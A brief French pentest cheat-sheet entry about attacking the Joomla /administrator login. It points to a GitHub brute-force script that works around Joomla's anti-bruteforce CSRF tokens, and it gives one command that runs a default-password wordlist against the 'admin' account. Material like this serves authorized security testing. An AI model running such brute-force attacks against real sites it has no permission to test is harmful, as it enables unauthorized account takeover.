Le panneau d'administration Joomla (`/administrator`) est un point d'entrée fréquent en pentest. Le script `joomla-bruteforce` gère les tokens [[CSRF - Cross-Site Request Forgery|CSRF]] anti-bruteforce de Joomla et permet d'essayer une wordlist contre l'utilisateur `admin` ou tout autre compte connu.
https://github.com/ajnik/joomla-bruteforce
```shell-session
python3 joomla-brute.py -u http://$url -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
```